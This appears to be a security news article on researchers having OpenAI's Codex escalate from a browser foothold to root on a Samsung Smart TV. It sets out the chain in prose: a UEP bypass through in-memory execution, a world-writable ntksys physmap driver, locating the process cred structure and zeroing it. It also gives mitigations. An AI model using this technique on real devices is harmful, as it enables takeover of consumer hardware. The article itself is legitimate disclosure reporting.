Codex Hacks Samsung TV to Root by Exploiting World-Writable Driver Interfaces

OpenAI’s Codex AI model successfully escalated privileges to root on a real Samsung Smart TV by exploiting world-writable kernel driver interfaces — a finding that raises serious questions about how hardware vendors handle device security on consumer electronics.

The experiment, published by CALIF on April 14, 2026, started from a browser-level foothold already established on the TV.

Researchers began with code execution inside the Samsung TV’s browser application, running under a low-privileged user context with uid=5001.

From that position, the team gave Codex direct access to the live device alongside the matching KantS2 firmware source tree — Samsung’s internal platform name for the Smart TV firmware on this model.

The core question was straightforward: given a realistic post-exploitation position, could an AI take that foothold all the way to root without being pointed toward any specific bug?

CALIF analysts noted that Codex was never directed to a particular driver, never told to look at physical memory, and never given any information about kernel credentials.

The AI had to enumerate the target surface on its own, read through Samsung’s vendor driver source code, and verify every finding against the live device — behavior that closely mirrors a skilled human penetration tester working a real engagement.

The TV runs Linux kernel 4.1.10 under Samsung’s Tizen platform, which includes Unauthorized Execution Prevention, or UEP — a protection that stops unsigned binaries from running off disk.

The research environment already included a memfd wrapper, a helper that loads programs into anonymous in-memory file descriptors and runs them from memory instead of a file path, bypassing UEP entirely.

Codex used this throughout the session to deploy and run its custom-built static ARMv7 binaries on the target without triggering any disk-based execution checks.

During enumeration, Codex identified three world-writable device nodes from the ntk* driver family: ntkhdma, ntksys, and ntkxdma.

These interfaces, visible as crw-rw-rw- in the device listing, belonged to the Novatek Microelectronics stack Samsung had shipped with the firmware.

Since all three were accessible from the browser shell, loaded on the device, and present in the released KantS2 source tree, they formed the main attack surface for the session.

How Codex Turned Driver Access Into Root

The core vulnerability sits inside /dev/ntksys, a Samsung kernel driver that lets user-space programs register a physical memory address and size, then map that memory directly into their own process space through mmap.

Security researchers call this a physmap primitive — it hands unprivileged code raw read and write access to physical memory with no kernel code-execution trick required.

The root cause is a shipping udev rule that grants world-writable permissions (KERNEL=="ntksys", MODE="0666"), combined with a driver that validates only the table slot index and ignores whether the requested range overlaps kernel-owned or privileged memory.

This is visible in ker_sys.c around line 1158, where the attacker-supplied address is stored into a slot and later remapped verbatim by vk_remap_pfn_range.

Codex built the exploit step by step. It queried /dev/ntkhdma first, which returned the DMA buffer’s physical address (0x84840000) to an unprivileged caller, giving Codex a known-good page to test against.

It then mapped that page through ntksys and confirmed it could read and write to it from the browser shell. With the primitive proven, Codex scanned RAM windows from /proc/cmdline, found the browser process’s cred structure by matching its stored uid and gid values, and zeroed those fields out.

The final shell confirmed full privilege escalation: uid=0(root) gid=0(root). Samsung and vendors shipping similar driver stacks should restrict ntk* device node permissions to privileged processes only, remove world-writable udev rules from any memory-management interface, and add physical range validation inside the ntksys driver before any mmap call is allowed.

Third-party kernel components embedded in consumer firmware should be audited against the principle of least privilege before shipping. The full write-up and proof-of-concept code are available at the CALIF GitHub repository under MADBugs/samsung-tv.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.